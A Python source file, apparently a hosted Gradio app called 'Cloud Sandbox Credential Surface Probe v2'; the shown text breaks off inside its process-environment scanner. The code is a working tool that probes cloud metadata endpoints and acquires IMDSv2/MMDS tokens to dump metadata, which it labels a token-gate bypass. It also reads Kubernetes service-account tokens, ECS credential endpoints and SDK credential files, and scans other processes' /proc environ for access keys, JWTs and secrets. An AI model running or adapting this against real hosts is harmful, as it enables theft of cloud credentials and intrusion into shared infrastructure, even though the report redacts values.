Spaces:
Sleeping
Sleeping
| """ | |
| Cloud Sandbox Credential Surface Probe v2 | |
| ========================================== | |
| Enumerates 9 credential storage/delivery channels in cloud sandbox environments, | |
| applies extraction techniques, and produces an actionable channel-mapped report. | |
| Credential Channels: | |
| 1. IMDS / MMDS (network endpoint) | |
| 2. ECS Container Endpoint (network endpoint) | |
| 3. IRSA / WI Projected Volume (file) | |
| 4. K8s Service Account Token (file, pivot) | |
| 5. SDK Configuration Files (file) | |
| 6. Hardcoded ENV Injection (environment variable) | |
| 7. Credential Helper (helper binary) | |
| 8. Sidecar / Reverse Proxy (out-of-sandbox) | |
| 9. UDS Proxy (socket) | |
| Extraction Techniques (orthogonal to channels): | |
| - Direct access (curl / cat / env / helper invoke) | |
| - Process environ scanning (/proc/*/environ) | |
| - Docker socket interaction (container inspect) | |
| - MMDS full dump with token acquisition | |
| """ | |
| import gradio as gr | |
| import argparse | |
| import json | |
| import os | |
| import platform | |
| import re | |
| import shutil | |
| import socket | |
| import stat as statmod | |
| import sys | |
| import time | |
| import urllib.error | |
| import urllib.parse | |
| import urllib.request | |
| # --------------------------------------------------------------------------- | |
| # Constants | |
| # --------------------------------------------------------------------------- | |
# Default per-request timeout (seconds) used by http_get().
DEFAULT_TIMEOUT = 2.5
# Default read cap for file/HTTP previews and default truncation length of
# sanitize_preview().
PREVIEW_BYTES = 160
# Maximum number of environment keys reported by the env collectors.
ENV_KEY_LIMIT = 60
# Maximum number of directory entries returned by list_directory().
LISTING_LIMIT = 30
# Maximum number of socket paths returned by find_socket_files().
SOCKET_PATH_LIMIT = 50
# Maximum number of /proc/<pid> entries sampled by _scan_proc_environ().
PROC_SAMPLE_LIMIT = 40
# Substring looked for (lower-cased) in a 401 response body by
# _is_firecracker_gated().
MMDS_TOKEN_HINT = "x-metadata-token"
# Substring looked for (lower-cased) in the "server" response header by
# _is_firecracker_gated().
FIRECRACKER_SERVER_HINT = "firecracker api"
# Prefix prepended to AWS_CONTAINER_CREDENTIALS_RELATIVE_URI in collect_channel_2().
ECS_RELATIVE_URI_BASE = "http://169.254.170.2"
# Lower-case response header names that filter_headers() keeps; all other
# headers are dropped from probe results.
HEADER_ALLOWLIST = {
    "server", "content-type", "content-length", "metadata-flavor",
    "www-authenticate", "x-aws-ec2-metadata-token-ttl-seconds",
    "x-ms-version", "date",
}
# Metadata endpoint probes (channel 1 raw reachability).
# Each entry is requested by probe_metadata_endpoints() using "url" and
# "headers"; "provider" and "name" are copied onto the result as labels.
# Several providers are probed both with and without their required header.
PROBES = [
    {"provider": "aws", "name": "aws_root",
     "url": "http://169.254.169.254/", "headers": {}},
    {"provider": "aws", "name": "aws_meta_root",
     "url": "http://169.254.169.254/latest/meta-data/", "headers": {}},
    {"provider": "aws", "name": "aws_dynamic_identity",
     "url": "http://169.254.169.254/latest/dynamic/instance-identity/document",
     "headers": {}},
    {"provider": "firecracker", "name": "firecracker_mmds_ssh_keys",
     "url": "http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/",
     "headers": {}},
    {"provider": "gcp", "name": "gcp_meta_no_header",
     "url": "http://metadata.google.internal/computeMetadata/v1/",
     "headers": {}},
    {"provider": "gcp", "name": "gcp_meta_with_header",
     "url": "http://metadata.google.internal/computeMetadata/v1/",
     "headers": {"Metadata-Flavor": "Google"}},
    {"provider": "azure", "name": "azure_meta_no_header",
     "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
     "headers": {}},
    {"provider": "azure", "name": "azure_meta_with_header",
     "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
     "headers": {"Metadata": "true"}},
    {"provider": "aliyun", "name": "aliyun_meta_root",
     "url": "http://100.100.100.200/latest/meta-data/", "headers": {}},
    {"provider": "digitalocean", "name": "digitalocean_meta_root",
     "url": "http://169.254.169.254/metadata/v1/", "headers": {}},
    {"provider": "oci", "name": "oci_meta_no_header",
     "url": "http://169.254.169.254/opc/v2/", "headers": {}},
    {"provider": "oci", "name": "oci_meta_with_header",
     "url": "http://169.254.169.254/opc/v2/",
     "headers": {"Authorization": "Bearer Oracle"}},
]
# MMDS / IMDSv2 token acquisition attempts.
# Each entry is sent by try_acquire_mmds_token() with the given method and
# headers and an empty request body.
MMDS_TOKEN_PROBES = [
    {"name": "imdsv2_put_token", "method": "PUT",
     "url": "http://169.254.169.254/latest/api/token",
     "headers": {"X-metadata-token-ttl-seconds": "21600"}},
    {"name": "mmds_put_token", "method": "PUT",
     "url": "http://169.254.169.254/latest/meta-data/mmds/token",
     "headers": {"X-metadata-token-ttl-seconds": "300"}},
]
# Env patterns for interesting key detection.
# Matching is a plain substring test against the upper-cased variable name,
# so short entries such as "CI" or "KEY" match any name that contains them.
INTERESTING_ENV_PATTERNS = [
    "AWS_", "AZURE_", "GCP", "GOOGLE_", "KUBERNETES", "KUBE_",
    "ECS", "EC2", "CONTAINER", "DOCKER", "POD", "CI",
    "GITHUB_", "GITLAB_", "CODESPACES", "DEVCONTAINER",
    "FIRECRACKER", "MMDS",
    "CSB", "CODESANDBOX", "PITCHER", "SANDBOX",
    "RAILWAY", "FLY_", "RENDER_", "REPLIT_", "GITPOD_",
    "TOKEN", "SECRET", "KEY", "CRED", "AUTH", "PASS",
]
# Regex for sensitive values in /proc/*/environ.
# Three alternatives: "AKIA" followed by 16 characters from [0-9A-Z], one of
# the listed keywords, or "eyJ" followed by at least 10 characters from
# [A-Za-z0-9_-]. re.IGNORECASE applies to every alternative, and
# _scan_proc_environ() searches both the key and the value with it.
SENSITIVE_ENVIRON_RE = re.compile(
    r'(AKIA[0-9A-Z]{16}'
    r'|(?:SECRET|TOKEN|KEY|PASS|CRED|AUTH|MMDS|PITCHER|CSB|CODESANDBOX|SANDBOX)'
    r'|(?:eyJ[A-Za-z0-9_-]{10,})'
    r')',
    re.IGNORECASE,
)
# Environment variables read by collect_channel_2() to locate a container
# credential endpoint.
ECS_ENV_KEYS = [
    "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
    "AWS_CONTAINER_CREDENTIALS_FULL_URI",
]
# Per-user SDK paths checked by collect_channel_5() after "~" expansion.
SDK_PATHS = [
    "~/.aws/credentials", "~/.aws/config",
    "~/.config/gcloud/application_default_credentials.json",
    "~/.config/gcloud/access_tokens.db",
    "~/.azure",
]
# Files whose first bytes are previewed by collect_runtime_context().
FILE_PREVIEW_PATHS = [
    "/proc/1/cgroup", "/proc/self/cgroup", "/proc/1/cmdline",
    "/etc/hostname", "/etc/resolv.conf",
    "/sys/class/dmi/id/product_name", "/sys/class/dmi/id/product_version",
    "/sys/class/dmi/id/sys_vendor", "/sys/class/dmi/id/board_vendor",
    "/sys/hypervisor/uuid",
]
# Paths that collect_runtime_context() only stats (existence / size / readability).
FILE_STAT_PATHS = [
    "/.dockerenv", "/run/.containerenv",
    "/var/lib/cloud/instance/cloud-config.txt", "/etc/cloud/cloud.cfg",
    "/var/run/secrets/kubernetes.io/serviceaccount/token",
    "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
]
# Directories whose entries are sampled by collect_runtime_context().
DIRECTORY_LIST_PATHS = ["/var/lib/cloud", "/var/run/secrets", "/run", "/tmp"]
# NOTE(review): not referenced in the visible part of this file — confirm usage.
PODMAN_ARTIFACT_PATHS = ["/run/containers", "/run/libpod", "/run/crun"]
| # --------------------------------------------------------------------------- | |
| # Utility helpers | |
| # --------------------------------------------------------------------------- | |
def normalize_path(path):
    """Return *path* adapted to the host platform.

    When ``os.name`` is ``"nt"`` and *path* starts with ``"/"``, every forward
    slash is replaced by a backslash. In all other cases *path* is returned
    unchanged.
    """
    needs_conversion = os.name == "nt" and path.startswith("/")
    return path.replace("/", "\\") if needs_conversion else path
def sanitize_preview(text, limit=PREVIEW_BYTES):
    """Collapse whitespace in *text* and truncate it to *limit* characters.

    Carriage returns are turned into spaces first, then every run of
    whitespace is replaced by a single space.
    """
    without_cr = text.replace("\r", " ")
    collapsed = re.sub(r"\s+", " ", without_cr)
    return collapsed[:limit]
def redact_value(value, keep=12):
    """Return *value* shortened to its first *keep* characters.

    Values no longer than *keep* are returned unchanged. Longer values become
    the prefix followed by ``...(<total length> chars)``.
    """
    total = len(value)
    if total > keep:
        return value[:keep] + f"...({total} chars)"
    return value
def filter_headers(headers):
    """Return a dict with only the headers whose lower-cased name is allowlisted.

    *headers* must expose ``items()``; the allowlist is HEADER_ALLOWLIST.
    """
    kept = {}
    for name, value in headers.items():
        if name.lower() in HEADER_ALLOWLIST:
            kept[name] = value
    return kept
def get_header_value(headers, key):
    """Look up *key* in *headers* case-insensitively.

    Returns the value of the first header whose name matches, or ``None``
    when no header matches.
    """
    return next(
        (value for name, value in headers.items()
         if name.lower() == key.lower()),
        None,
    )
| # --------------------------------------------------------------------------- | |
| # Low-level I/O | |
| # --------------------------------------------------------------------------- | |
def stat_path(path):
    """Report existence, size, type and readability of *path*.

    Returns a dict that always has ``path``, ``exists`` and ``readable``.
    When the stat call succeeds it also has ``size`` and ``is_dir``; when it
    fails it has ``error`` (``"<ExceptionType>: <message>"``) instead.

    Readability of a regular path is tested by actually opening it for
    reading. A directory cannot be opened that way, so it is tested with
    ``os.access(..., os.R_OK)`` rather than being assumed readable.
    """
    target = normalize_path(path)
    info = {"path": path, "exists": False, "readable": False}
    try:
        st = os.stat(target)
    except Exception as exc:
        info["error"] = f"{type(exc).__name__}: {exc}"
        return info
    info["exists"] = True
    info["size"] = st.st_size
    info["is_dir"] = os.path.isdir(target)
    if info["is_dir"]:
        # open() on a directory always fails, which says nothing about
        # permissions; ask the OS whether the directory can be listed.
        info["readable"] = os.access(target, os.R_OK)
        return info
    try:
        with open(target, "rb"):
            info["readable"] = True
    except OSError:
        # Best effort: an unreadable file simply keeps readable=False.
        pass
    return info
def read_preview(path, limit=PREVIEW_BYTES):
    """Read up to *limit* bytes of *path* and return a sanitized preview.

    The result dict always has ``path``, ``exists`` and ``readable``. On
    success it gains ``preview`` (decoded as UTF-8 with replacement, then
    passed through sanitize_preview). On failure it gains ``error``.
    """
    target = normalize_path(path)
    outcome = {"path": path, "exists": False, "readable": False}
    try:
        with open(target, "rb") as handle:
            # The open succeeded, so the path exists and is readable even if
            # the read below fails.
            outcome.update(exists=True, readable=True)
            text = handle.read(limit).decode("utf-8", errors="replace")
            outcome["preview"] = sanitize_preview(text, limit)
    except FileNotFoundError:
        outcome["error"] = "FileNotFoundError"
    except Exception as exc:
        outcome["exists"] = os.path.exists(target)
        outcome["error"] = f"{type(exc).__name__}: {exc}"
    return outcome
def read_full(path, limit=65536):
    """Return up to *limit* raw bytes of *path*, or ``None`` if reading fails."""
    target = normalize_path(path)
    try:
        with open(target, "rb") as handle:
            data = handle.read(limit)
    except Exception:
        return None
    return data
def list_directory(path, limit=LISTING_LIMIT):
    """List *path* and return its first *limit* entries in sorted order.

    The result dict always has ``path``, ``exists`` and ``readable``. On
    success it also has ``entries`` (truncated) and ``entry_count`` (the full
    count). On failure it has ``error``.
    """
    target = normalize_path(path)
    outcome = {"path": path, "exists": False, "readable": False}
    try:
        names = sorted(os.listdir(target))
    except FileNotFoundError:
        outcome["error"] = "FileNotFoundError"
    except Exception as exc:
        outcome["exists"] = os.path.exists(target)
        outcome["error"] = f"{type(exc).__name__}: {exc}"
    else:
        outcome["exists"] = True
        outcome["readable"] = True
        outcome["entries"] = names[:limit]
        outcome["entry_count"] = len(names)
    return outcome
def find_socket_files(limit=SOCKET_PATH_LIMIT):
    """Walk a fixed set of directories and return paths of Unix socket files.

    Returns an empty list on Windows. The walk stops as soon as *limit* paths
    have been collected. Entries that cannot be stat'ed are skipped.

    Roots that resolve to the same real directory (for example ``/var/run``
    being a symlink to ``/run``) are walked only once, so the same socket is
    not reported twice and duplicates do not use up the limit.
    """
    if os.name == "nt":
        return []
    findings = []
    visited_roots = set()
    for root in ["/run", "/var/run", "/tmp", "/project", "/workspace"]:
        target = normalize_path(root)
        if not os.path.isdir(target):
            continue
        resolved = os.path.realpath(target)
        if resolved in visited_roots:
            continue
        visited_roots.add(resolved)
        for current_dir, _, files in os.walk(target):
            for file_name in files:
                candidate = os.path.join(current_dir, file_name)
                try:
                    is_socket = statmod.S_ISSOCK(os.stat(candidate).st_mode)
                except OSError:
                    # Vanished or inaccessible entry: skip it.
                    continue
                if is_socket:
                    findings.append(candidate)
                    if len(findings) >= limit:
                        return findings
    return findings
| # --------------------------------------------------------------------------- | |
| # HTTP helpers | |
| # --------------------------------------------------------------------------- | |
def http_get(url, headers=None, timeout=DEFAULT_TIMEOUT, method="GET",
             data=None, read_limit=PREVIEW_BYTES):
    """Perform one HTTP request and describe the outcome as a dict.

    Despite the name, *method* may be any HTTP verb. At most *read_limit*
    bytes of the response body are read and decoded as UTF-8 with replacement.

    The result always has ``status``, ``ok`` and ``latency_ms``:

    * success: ``status``, ``ok=True``, filtered ``headers``, ``body``;
    * HTTP error status: ``status``, ``ok=False``, filtered ``headers``,
      ``error`` (the reason) and ``body`` (may be ``None``);
    * anything else (timeout, connection failure, malformed URL):
      ``status=None``, ``ok=False`` and ``error``.

    The function does not raise for request failures; building the request is
    inside the ``try`` so that a malformed *url* yields an error dict too.
    """
    hdrs = headers or {}
    # Monotonic clock: latency must not be affected by wall-clock adjustments.
    started = time.monotonic()

    def elapsed_ms():
        return round((time.monotonic() - started) * 1000, 2)

    def failure(message):
        return {"status": None, "ok": False,
                "latency_ms": elapsed_ms(),
                "error": message}

    try:
        req = urllib.request.Request(url, headers=hdrs, method=method, data=data)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(read_limit).decode("utf-8", errors="replace")
            return {
                "status": resp.status, "ok": True,
                "latency_ms": elapsed_ms(),
                "headers": filter_headers(resp.headers),
                "body": body,
            }
    except urllib.error.HTTPError as exc:
        # HTTPError is a subclass of URLError, so it must be handled first.
        preview = None
        try:
            preview = exc.read(read_limit).decode("utf-8", errors="replace")
        except Exception:
            pass
        return {
            "status": exc.code, "ok": False,
            "latency_ms": elapsed_ms(),
            "headers": filter_headers(exc.headers),
            "error": str(exc.reason), "body": preview,
        }
    except urllib.error.URLError as exc:
        reason = exc.reason
        if isinstance(reason, socket.timeout):
            return failure("timeout")
        return failure(f"{type(reason).__name__}: {reason}")
    except socket.timeout:
        return failure("timeout")
    except Exception as exc:
        return failure(f"{type(exc).__name__}: {exc}")
def uds_http_get(socket_path, http_path, timeout=5, recv_limit=65536):
    """Send an HTTP/1.0 GET over a Unix domain socket and return the body.

    *recv_limit* is the size passed to each ``recv`` call; the response is
    read until the peer closes the connection. The response is decoded as
    UTF-8 with replacement. If it contains a blank line (``\\r\\n\\r\\n``),
    only the text after the first one is returned; otherwise the whole
    response is returned.

    Connection and I/O errors (including timeouts) propagate to the caller.
    The socket is closed in every case.
    """
    request = f"GET {http_path} HTTP/1.0\r\nHost: localhost\r\n\r\n"
    chunks = []
    # The context manager closes the socket even when connect/send/recv raise.
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as conn:
        conn.settimeout(timeout)
        conn.connect(socket_path)
        conn.sendall(request.encode())
        while True:
            chunk = conn.recv(recv_limit)
            if not chunk:
                break
            chunks.append(chunk)
    raw = b"".join(chunks).decode("utf-8", errors="replace")
    _, separator, body = raw.partition("\r\n\r\n")
    return body if separator else raw
def uds_send_json(socket_path, payload, timeout=3, recv_limit=4096):
    """Send *payload* as one JSON line over a Unix domain socket.

    The payload is serialised with ``json.dumps`` and terminated by a
    newline. A single ``recv`` of up to *recv_limit* bytes is performed and
    returned decoded as UTF-8 with replacement.

    Connection and I/O errors (including timeouts) propagate to the caller.
    The socket is closed in every case.
    """
    message = (json.dumps(payload) + "\n").encode()
    # The context manager closes the socket even when connect/send/recv raise.
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as conn:
        conn.settimeout(timeout)
        conn.connect(socket_path)
        conn.sendall(message)
        reply = conn.recv(recv_limit)
    return reply.decode("utf-8", errors="replace")
| # --------------------------------------------------------------------------- | |
| # Runtime fingerprinting | |
| # --------------------------------------------------------------------------- | |
def get_runtime():
    """Return basic facts about the current process and host.

    Keys: ``hostname``, ``platform``, ``python_version``, ``pid``, ``uid``
    (``None`` where ``os.getuid`` is unavailable), ``cwd``, ``argv`` and
    ``env_key_count``.
    """
    uid = os.getuid() if hasattr(os, "getuid") else None
    return dict(
        hostname=socket.gethostname(),
        platform=platform.platform(),
        python_version=platform.python_version(),
        pid=os.getpid(),
        uid=uid,
        cwd=os.getcwd(),
        argv=sys.argv,
        env_key_count=len(os.environ),
    )
def collect_runtime_context():
    """Gather filesystem and environment markers describing the sandbox.

    Returns a dict with file previews (FILE_PREVIEW_PATHS), file stats
    (FILE_STAT_PATHS), directory listings (DIRECTORY_LIST_PATHS) and the
    names of interesting environment variables.
    """
    context = {}
    context["file_previews"] = list(map(read_preview, FILE_PREVIEW_PATHS))
    context["file_stats"] = list(map(stat_path, FILE_STAT_PATHS))
    context["directory_samples"] = list(map(list_directory, DIRECTORY_LIST_PATHS))
    context["interesting_env_keys"] = _collect_env_keys()
    return context
def _collect_env_keys():
    """Return sorted env variable names that contain an interesting pattern.

    A name matches when its upper-cased form contains any entry of
    INTERESTING_ENV_PATTERNS. At most ENV_KEY_LIMIT names are returned.
    """
    interesting = [
        name for name in sorted(os.environ)
        if any(pattern in name.upper() for pattern in INTERESTING_ENV_PATTERNS)
    ]
    return interesting[:ENV_KEY_LIMIT]
| # --------------------------------------------------------------------------- | |
| # Channel 1 – IMDS / MMDS | |
| # --------------------------------------------------------------------------- | |
def _is_firecracker_gated(item):
    """Tell whether a probe result looks like a token-gated Firecracker MMDS.

    True only when the status is 401, the ``server`` header contains
    FIRECRACKER_SERVER_HINT and the body (or ``preview``) contains
    MMDS_TOKEN_HINT; both comparisons are case-insensitive.
    """
    if item.get("status") == 401:
        server = get_header_value(item.get("headers", {}), "server") or ""
        text = (item.get("body") or item.get("preview") or "").lower()
        return FIRECRACKER_SERVER_HINT in server.lower() and MMDS_TOKEN_HINT in text
    return False
def probe_metadata_endpoints(timeout):
    """Request every entry of PROBES and return the labelled results.

    Each result is the dict returned by http_get, extended with the probe's
    ``provider``, ``name`` and ``url``.
    """
    outcomes = []
    for probe in PROBES:
        outcome = http_get(probe["url"], headers=probe["headers"],
                           timeout=timeout, read_limit=PREVIEW_BYTES)
        outcome.update(provider=probe["provider"], name=probe["name"],
                       url=probe["url"])
        outcomes.append(outcome)
    return outcomes
def try_acquire_mmds_token(timeout):
    """Attempt each entry of MMDS_TOKEN_PROBES and summarise the outcome.

    Returns one dict per probe with ``name``, ``status``, ``ok`` and
    ``latency_ms``. When a non-empty body comes back, ``token_length`` and
    ``token_preview`` are added; ``error`` is added when the request reported
    one.

    ``token_preview`` holds only a redacted prefix, so the report never
    carries a complete session token.
    """
    results = []
    for tp in MMDS_TOKEN_PROBES:
        r = http_get(tp["url"], headers=tp["headers"], method=tp["method"],
                     data=b"", timeout=timeout, read_limit=256)
        entry = {
            "name": tp["name"],
            "status": r.get("status"),
            "ok": r.get("ok", False),
            "latency_ms": r.get("latency_ms"),
        }
        if r.get("ok") and r.get("body"):
            token = r["body"].strip()
            entry["token_length"] = len(token)
            # A "preview" must not be the full credential: redact it the same
            # way every other reported value is redacted.
            entry["token_preview"] = redact_value(token, 12)
        if r.get("error"):
            entry["error"] = r["error"]
        results.append(entry)
    return results
def dump_mmds_full(token, timeout=5):
    """Fetch the metadata tree root with *token* and summarise it.

    The result always has ``token_ok`` and ``raw_size``. If the request
    fails, ``error`` is set. If the body is not JSON, ``tree_raw_preview``
    holds a sanitized preview. Otherwise ``key_inventory`` lists leaf keys
    with redacted values and ``decoded_files`` holds redacted decodings of
    any ``additional_files`` entries. A failure while decoding is recorded
    under ``decoded_files["_error"]``, and entries decoded before the failure
    are kept.
    """
    result = {"token_ok": False, "raw_size": 0}
    response = http_get(
        "http://169.254.169.254/",
        headers={"X-metadata-token": token, "Accept": "application/json"},
        timeout=timeout,
        read_limit=262144,  # 256 KB
    )
    if not response.get("ok"):
        result["error"] = response.get("error", f"status={response.get('status')}")
        return result

    body = response.get("body", "")
    result["token_ok"] = True
    result["raw_size"] = len(body)
    try:
        tree = json.loads(body)
    except json.JSONDecodeError:
        result["tree_raw_preview"] = sanitize_preview(body, 2048)
        return result

    # Inventory of leaf keys; values are redacted by _walk_keys.
    key_inventory = []
    _walk_keys(tree, "", key_inventory, depth=0)
    result["key_inventory"] = key_inventory

    # additional_files entries are lists of byte values (or dicts with a
    # "content" list); decode them and redact each line.
    decoded_files = {}
    try:
        additional = tree.get("latest", {}).get("additional_files", {})
        if not additional:
            # Fall back to the first top-level dict that has the key.
            additional = next(
                (sub["additional_files"] for sub in tree.values()
                 if isinstance(sub, dict) and "additional_files" in sub),
                additional,
            )
        for file_path, file_obj in additional.items():
            if isinstance(file_obj, list):
                content = file_obj
            elif isinstance(file_obj, dict):
                content = file_obj.get("content", [])
            else:
                content = []
            if not isinstance(content, list):
                continue
            raw_text = bytes(content).decode("utf-8", errors="replace")
            lines = raw_text.split("\n")
            redacted = []
            for line in lines:
                if "=" in line:
                    name, _, value = line.partition("=")
                    redacted.append(f"{name}={redact_value(value, 16)}")
                elif line.strip():
                    redacted.append(redact_value(line, 40))
            decoded_files[file_path] = {
                "line_count": len(lines),
                "raw_length": len(raw_text),
                "content_redacted": "\n".join(redacted),
            }
    except Exception as exc:
        decoded_files["_error"] = f"{type(exc).__name__}: {exc}"
    result["decoded_files"] = decoded_files
    return result
| def _walk_keys(obj, prefix, acc, depth=0, max_depth=6): | |
| if depth > max_depth: | |
| return | |
| if isinstance(obj, dict): | |
| for k, v in obj.items(): | |
| full = f"{prefix}/{k}" if prefix else k | |
| if isinstance(v, (dict, list)): | |
| _walk_keys(v, full, acc, depth + 1, max_depth) | |
| else: | |
| val_str = str(v) | |
| acc.append({"key": full, "type": type(v).__name__, | |
| "value_preview": redact_value(val_str, 20)}) | |
| elif isinstance(obj, list) and len(obj) < 200: | |
| acc.append({"key": prefix, "type": "list", | |
| "value_preview": f"[{len(obj)} items]"}) | |
def collect_channel_1(timeout):
    """Channel 1: IMDS / MMDS – probe endpoints, try tokens, classify.

    Returns a dict with the overall ``status``, the raw ``probes`` and
    ``token_attempts``, the optional ``mmds_dump`` and the probe names
    grouped as ``directly_reachable``, ``mmds_token_gated`` and ``blocked``.

    Status precedence: ``directly_reachable`` > ``token_gate_bypassed`` >
    ``token_gated`` > ``blocked``; ``open`` is reported only when none of
    these apply.
    """
    probes = probe_metadata_endpoints(timeout)
    token_attempts = try_acquire_mmds_token(timeout)

    acquired_token = None
    for attempt in token_attempts:
        if not (attempt.get("ok") and attempt.get("token_length", 0) > 0):
            continue
        # The attempt summary does not carry the token, so fetch it again.
        # NOTE(review): the re-fetch always targets MMDS_TOKEN_PROBES[0],
        # whichever attempt succeeded.
        refetch = http_get(MMDS_TOKEN_PROBES[0]["url"],
                           headers=MMDS_TOKEN_PROBES[0]["headers"],
                           method="PUT", data=b"", timeout=timeout,
                           read_limit=512)
        if refetch.get("ok"):
            acquired_token = refetch["body"].strip()
            break

    mmds_dump = None
    if acquired_token:
        mmds_dump = dump_mmds_full(acquired_token, timeout=max(timeout, 5))

    # Sort every probe into exactly one bucket.
    reachable, mmds_gated, blocked = [], [], []
    for item in probes:
        if item.get("status") == 200:
            bucket = reachable
        elif _is_firecracker_gated(item):
            bucket = mmds_gated
        else:
            bucket = blocked
        bucket.append(item["name"])

    if reachable:
        status = "directly_reachable"
    elif acquired_token and mmds_dump and mmds_dump.get("token_ok"):
        status = "token_gate_bypassed"
    elif mmds_gated:
        status = "token_gated"
    elif blocked:
        status = "blocked"
    else:
        status = "open"

    return {
        "status": status,
        "probes": probes,
        "token_attempts": token_attempts,
        "mmds_dump": mmds_dump,
        "directly_reachable": reachable,
        "mmds_token_gated": mmds_gated,
        "blocked": blocked,
    }
| # --------------------------------------------------------------------------- | |
| # Channel 2 – ECS Container Credential Endpoint | |
| # --------------------------------------------------------------------------- | |
def collect_channel_2(timeout):
    """Channel 2: request the container credential endpoint named in the env.

    For each variable in ECS_ENV_KEYS that is set, the URL is requested (the
    relative variant is prefixed with ECS_RELATIVE_URI_BASE) and a redacted
    summary is recorded. Status is ``detected`` when any request succeeded,
    ``env_present`` when a variable was set but no request succeeded, and
    ``not_found`` otherwise.
    """
    entries = []
    for key in ECS_ENV_KEYS:
        val = os.environ.get(key)
        if not val:
            continue
        if key.endswith("RELATIVE_URI"):
            url = f"{ECS_RELATIVE_URI_BASE}{val}"
        else:
            url = val
        response = http_get(url, timeout=timeout, read_limit=512)
        body_preview = None
        if response.get("body"):
            body_preview = redact_value(response.get("body", ""), 40)
        entries.append({
            "env_key": key, "url_redacted": redact_value(url, 30),
            "status": response.get("status"), "ok": response.get("ok", False),
            "body_preview": body_preview,
            "error": response.get("error"),
        })

    if any(e["ok"] for e in entries):
        status = "detected"
    elif entries:
        status = "env_present"
    else:
        status = "not_found"
    return {"status": status, "entries": entries}
| # --------------------------------------------------------------------------- | |
| # Channel 3 – IRSA / Workload Identity projected volumes | |
| # --------------------------------------------------------------------------- | |
def collect_channel_3():
    """Channel 3: inspect files referenced by identity-token env variables.

    For each of the three variables that is set, the referenced path is
    stat'ed. If it is readable, a redacted preview and a ``jwt_like`` flag
    (at least two dots in the preview) are added. Status is ``detected`` when
    any variable was set.
    """
    env_keys = (
        "AWS_WEB_IDENTITY_TOKEN_FILE",
        "GOOGLE_APPLICATION_CREDENTIALS",
        "AZURE_CLIENT_CERTIFICATE_PATH",
    )
    pointers = []
    for env_key in env_keys:
        val = os.environ.get(env_key)
        if not val:
            continue
        info = stat_path(val)
        entry = {"env_key": env_key, "path": val}
        entry.update(info)
        if info.get("readable"):
            text = read_preview(val, limit=240).get("preview", "")
            entry["content_preview"] = redact_value(text, 40)
            entry["jwt_like"] = text.count(".") >= 2
        pointers.append(entry)
    status = "detected" if pointers else "not_found"
    return {"status": status, "pointers": pointers}
| # --------------------------------------------------------------------------- | |
| # Channel 4 – Kubernetes Service Account Token | |
| # --------------------------------------------------------------------------- | |
def collect_channel_4():
    """Channel 4: check for a mounted Kubernetes service-account token.

    The result always has ``status`` and ``token`` (the stat info). When the
    token file exists and is readable, status becomes ``detected`` and a
    redacted preview, a ``jwt_like`` flag and, if readable, the namespace are
    added.
    """
    sa_dir = "/var/run/secrets/kubernetes.io/serviceaccount"
    token_path = sa_dir + "/token"
    ns_path = sa_dir + "/namespace"

    token_info = stat_path(token_path)
    result = {"status": "not_found", "token": token_info}
    if not (token_info.get("exists") and token_info.get("readable")):
        return result

    raw = read_preview(token_path, limit=300).get("preview", "")
    result["status"] = "detected"
    result["jwt_like"] = raw.count(".") >= 2
    result["content_preview"] = redact_value(raw, 30)
    ns_info = read_preview(ns_path, limit=100)
    if ns_info.get("readable"):
        result["namespace"] = ns_info.get("preview", "").strip()
    return result
| # --------------------------------------------------------------------------- | |
| # Channel 5 – SDK configuration files | |
| # --------------------------------------------------------------------------- | |
def collect_channel_5():
    """Channel 5: look for cloud SDK configuration files.

    First every entry of SDK_PATHS is expanded and stat'ed; readable regular
    files also get a redacted preview. Then a fixed set of sub-paths is
    checked directly under ``/home`` and ``/root`` (joined as
    ``<base>/<sub>``, with no per-user directory expansion), skipping any
    candidate equal to the current user's expanded path. Status is
    ``detected`` when any path exists.
    """
    found = []
    for raw_path in SDK_PATHS:
        expanded = os.path.expanduser(raw_path)
        info = stat_path(expanded)
        if not info.get("exists"):
            continue
        entry = {"path": expanded}
        entry.update(info)
        if info.get("readable") and not info.get("is_dir"):
            preview = read_preview(expanded, limit=512)
            entry["content_preview"] = redact_value(
                preview.get("preview", ""), 60)
        found.append(entry)

    # Also try /home/*/.aws etc
    sub_paths = (
        ".aws/credentials",
        ".aws/config",
        ".config/gcloud/application_default_credentials.json",
    )
    for home_base in ("/home", "/root"):
        for sub in sub_paths:
            candidate = os.path.join(home_base, sub)
            if candidate == os.path.expanduser(f"~/{sub}"):
                continue
            info = stat_path(candidate)
            if info.get("exists"):
                extra = {"path": candidate}
                extra.update(info)
                found.append(extra)

    status = "detected" if found else "not_found"
    return {"status": status, "files": found}
| # --------------------------------------------------------------------------- | |
| # Channel 6 – Hardcoded ENV injection | |
| # --------------------------------------------------------------------------- | |
def collect_channel_6():
    """Channel 6: report interesting variables in this and other processes.

    Variables of the current process are selected by INTERESTING_ENV_PATTERNS
    and reported with a redacted value and its length. Other processes are
    covered by _scan_proc_environ. ``current_process`` is truncated to
    ENV_KEY_LIMIT entries, while ``current_process_interesting_count`` is the
    untruncated count.
    """
    current_env = [
        {
            "key": key,
            "value_preview": redact_value(os.environ[key], 16),
            "value_length": len(os.environ[key]),
        }
        for key in sorted(os.environ)
        if any(pat in key.upper() for pat in INTERESTING_ENV_PATTERNS)
    ]
    cross_process = _scan_proc_environ()
    anything_found = bool(current_env or cross_process["findings"])
    return {
        "status": "detected" if anything_found else "not_found",
        "current_process_interesting_count": len(current_env),
        "current_process": current_env[:ENV_KEY_LIMIT],
        "cross_process": cross_process,
    }
def _scan_proc_environ():
    """Scan ``/proc/<pid>/environ`` of sampled processes for sensitive entries.

    Returns ``{"supported": False, "findings": []}`` when ``/proc`` is not a
    directory. Otherwise up to PROC_SAMPLE_LIMIT numeric entries (in string
    sort order) are sampled and up to 16384 bytes of each readable environ
    file are parsed. A variable is reported once per key, the first time its
    key or value matches SENSITIVE_ENVIRON_RE, with a redacted value.
    """
    proc_root = normalize_path("/proc")
    if not os.path.isdir(proc_root):
        return {"supported": False, "findings": []}

    findings = []
    reported_keys = set()
    sampled = 0
    readable = 0
    for pid in sorted(os.listdir(proc_root)):
        if not pid.isdigit():
            continue
        if sampled >= PROC_SAMPLE_LIMIT:
            break
        sampled += 1
